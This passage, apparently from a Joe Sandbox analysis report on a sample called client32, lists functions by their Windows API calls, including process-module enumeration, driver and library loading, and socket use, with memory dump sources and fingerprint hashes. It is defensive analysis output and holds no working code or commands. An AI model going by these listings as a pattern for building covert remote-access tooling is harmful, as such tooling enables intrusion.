                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110C55B,754D8400,?), ref: 1113F667
                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F687
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1113F68F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile$CloseHandle
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 1443461169-123907689
                                                                                                                  • Opcode ID: 0514b85a4bb7f076a42cb2970b1ad491c72ec6c51329d6f3be7243a02cb64eac
                                                                                                                  • Instruction ID: 008e4aca3803944ade0234e08cae1ccadc2d9757611747833c98392c386e5654
                                                                                                                  • Opcode Fuzzy Hash: 0514b85a4bb7f076a42cb2970b1ad491c72ec6c51329d6f3be7243a02cb64eac
                                                                                                                  • Instruction Fuzzy Hash: 6821DD70A0425BAFE312CE38DD60BD9BBA49F82325F2041E4F8D5DB1D5DA709A49C753
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6BEB4FC4
                                                                                                                  • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6BEB8E0D,00000000,?,6BEB8E0D,00000000,?,00000FA0,?), ref: 6BEB4FE4
                                                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,6BEB8E0D,00000000,?,00000FA0,?), ref: 6BEB4FED
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                  • String ID: EnumProcessModules
                                                                                                                  • API String ID: 3858832252-3735562946
                                                                                                                  • Opcode ID: 1377f9ad9f57204dbcfe91d58b22863763c0bd1f4c89b4837ad3914c5fea864f
                                                                                                                  • Instruction ID: 80dcd20ff97e065f3de252a3e158cb75186b386cbc2170b4266006237130afa8
                                                                                                                  • Opcode Fuzzy Hash: 1377f9ad9f57204dbcfe91d58b22863763c0bd1f4c89b4837ad3914c5fea864f
                                                                                                                  • Instruction Fuzzy Hash: F4F05872A00218AFC710DFA4E844E9B77ACEB88721F00881AF95AD7341C778E810CBA0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6BEB5014
                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6BEB8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6BEB5034
                                                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,6BEB8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6BEB503D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                  • String ID: GetModuleFileNameExA
                                                                                                                  • API String ID: 4084229558-758377266
                                                                                                                  • Opcode ID: c566b70330439b90460a8a83eb5979f364f431e45539b8fd494cabb84ac00697
                                                                                                                  • Instruction ID: abe7e7e109664ec9767593464704b623cfbeb32cff7339d42caac19ee78a4640
                                                                                                                  • Opcode Fuzzy Hash: c566b70330439b90460a8a83eb5979f364f431e45539b8fd494cabb84ac00697
                                                                                                                  • Instruction Fuzzy Hash: 89F05E72600218ABC720CF94E914E5777ECEB88710F00491AF946D7241C675E8108BB1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEBA4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,00000000,?,?,?,6BEBDA7F,?,00000000), ref: 6BEBA503
                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6BEBA568
                                                                                                                  • Sleep.KERNEL32(00000000,?,6BEBDA7F,?,00000000), ref: 6BEBA581
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898,00000000), ref: 6BEBA5B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4212191310-0
                                                                                                                  • Opcode ID: ee5eaffa8e74572704ffdc12d3e2d7791bebf8d8a6d9cad02bf6e1b6ca97ed0b
                                                                                                                  • Instruction ID: fa223a5985c5403c8857ea3bb9b494970eee16e1cb74a87382c6e1eb7501f288
                                                                                                                  • Opcode Fuzzy Hash: ee5eaffa8e74572704ffdc12d3e2d7791bebf8d8a6d9cad02bf6e1b6ca97ed0b
                                                                                                                  • Instruction Fuzzy Hash: B5210AB2D416009FDF118F28D941A46B7BCEFC5314F21145AD85683340D779E540CF91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB5C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ioctlsocket.WSOCK32(941034B3,4004667F,00000000,a3k), ref: 6BEB5D1F
                                                                                                                  • select.WSOCK32(00000001,?,00000000,?,00000000,941034B3,4004667F,00000000,a3k), ref: 6BEB5D62
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ioctlsocketselect
                                                                                                                  • String ID: a3k
                                                                                                                  • API String ID: 1457273030-1610497900
                                                                                                                  • Opcode ID: 5895d5620d4849d6300ad378e544ec3a68c0bc1580c723863e97aed56f2bfbc2
                                                                                                                  • Instruction ID: 5456e0841fee6601b1e13c9939be2c9dfe470dde559564fd32c7b3e465ce0ccd
                                                                                                                  • Opcode Fuzzy Hash: 5895d5620d4849d6300ad378e544ec3a68c0bc1580c723863e97aed56f2bfbc2
                                                                                                                  • Instruction Fuzzy Hash: 3B212C71A002188BEB28CF14C9597EDB7B9EB88304F1081DEE90997281DB745B94DF91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 110151E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102E966,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 110151F7
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11015208
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                  • String ID: \\.\NSWFPDrv
                                                                                                                  • API String ID: 3498533004-85019792
                                                                                                                  • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                  • Instruction ID: 8afacd648940fbcf920c8f513ecddd5490900b3845592452e47c7361a4afad73
                                                                                                                  • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                  • Instruction Fuzzy Hash: FFD0C971A420347AF231196AAC4CFCBAD0DDB427B5F210260FA3DE51C4C210489182F1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 6BEB8FE4
                                                                                                                  • getsockname.WSOCK32(?,?,00000010,?,02B03430,?), ref: 6BEB9005
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,00000010,?,02B03430,?), ref: 6BEB902E
                                                                                                                    • Part of subcall function 6BEB5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6BEB8F91,00000000,00000000,6BEFB8DA,?,00000080), ref: 6BEB5852
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3066294524-0
                                                                                                                  • Opcode ID: 111d9ac8c6a086e756ba39fbf2a7516b78c9065a3c183842975848772c1d1274
                                                                                                                  • Instruction ID: 8cf4b236f8b0653c3cf5eabae56307e387e758de73cd3c6b123549b7a5ee1a75
                                                                                                                  • Opcode Fuzzy Hash: 111d9ac8c6a086e756ba39fbf2a7516b78c9065a3c183842975848772c1d1274
                                                                                                                  • Instruction Fuzzy Hash: 49112E76E00118AFCB00DFA9DD01ABEB7B8EB89214F10456EED05E7240E779AA158B91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB5840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • inet_ntoa.WSOCK32(00000080,?,00000000,?,6BEB8F91,00000000,00000000,6BEFB8DA,?,00000080), ref: 6BEB5852
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: inet_ntoa
                                                                                                                  • String ID: gfff
                                                                                                                  • API String ID: 1879540557-1553575800
                                                                                                                  • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                                  • Instruction ID: 4fbdd244917d4761d3e70692ae58ffb8d1a84c2d83c2f7dde2b62979d7b30a25
                                                                                                                  • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                                  • Instruction Fuzzy Hash: 0611AB22A082D78BC3038B6DE8702C6BFD5DF87240B2844B9DAC9CB301C225D81AC7D1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,6BEB8DC8), ref: 6BEB4F78
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID: psapi.dll
                                                                                                                  • API String ID: 1029625771-80456845
                                                                                                                  • Opcode ID: 17060d40597afff76d9fa0e2975a2c7d172f18343e781dfc9409b57d14cfbccf
                                                                                                                  • Instruction ID: 183554f02c334f78ab7d5a5f885021ad28474306654eee4543328498105430ba
                                                                                                                  • Opcode Fuzzy Hash: 17060d40597afff76d9fa0e2975a2c7d172f18343e781dfc9409b57d14cfbccf
                                                                                                                  • Instruction Fuzzy Hash: E6E001B1A01B108F83B0CF3AA904642BBF4BB086503218E6E909EC3B01E334E585CF90
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 11015190 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102E930,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1101519E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID: nslsp.dll
                                                                                                                  • API String ID: 1029625771-3933918195
                                                                                                                  • Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                  • Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
                                                                                                                  • Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                  • Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 1105F240 Relevance: 3.2, APIs: 2, Instructions: 169COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                                    • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                                    • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                                  • std::exception::exception.LIBCMT ref: 1105F2E3
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 1105F2F8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1338273076-0
                                                                                                                  • Opcode ID: 9a071fc209cda2e2a2ff508c8b9122ae898b960265a67e42ef6659185843565e
                                                                                                                  • Instruction ID: 27c1c6abb081d98236a55b9714def59ee0ae50ea33d11c9255898d7f6f2dc0b9
                                                                                                                  • Opcode Fuzzy Hash: 9a071fc209cda2e2a2ff508c8b9122ae898b960265a67e42ef6659185843565e
                                                                                                                  • Instruction Fuzzy Hash: CD518DB6A00249AFDB50CF58D880E9AF7F9EB88214F04C56EEC599B341D775F901C7A1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEC6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6C26
